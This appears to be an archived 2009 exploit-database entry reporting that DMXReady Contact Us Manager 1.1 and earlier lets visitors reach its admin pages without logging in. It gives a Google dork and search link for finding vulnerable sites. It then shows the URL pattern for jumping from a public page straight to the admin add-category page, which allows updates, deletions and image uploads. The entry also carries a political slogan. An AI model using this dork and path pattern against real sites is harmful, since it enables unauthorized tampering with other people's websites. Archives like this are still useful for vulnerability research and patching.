id: 4660
date: 01/14/2009
title: DMXReady Contact Us Manager <= 1.1 Remote Contents Change Vuln
author: ajann
cves: 

==============================================================
DMXReady Contact Us Manager <= 1.1 Remote Contents Change Vuln
==============================================================


*******************************************************************************
# Title   :  DMXReady Contact Us Manager <= 1.1 Remote Contents Change Vulnerability
# Author  :  "ajann" from Turkey
# Contact :   :( 
# S.Page  :  http://www.dmxready.com
# $$      :  49.97 $
# Dork    :  inurl:inc_contactusmanager.asp
# DorkEx  :
http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_contactusmanager.asp&meta=

****Stop Attack ABD and ISRAEL !


*******************************************************************************

Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload

# http://[target]/[path]/admin/ContactUsManager/add_category.asp

Example: 
You Find -> http://[target]/[path]//applications/ContactUsManager/inc_contactusmanager.asp
Edit  ->    http://[target]/[path]//admin/ContactUsManager/add_category.asp

 :)



#  0day.today [2023-03-24]  #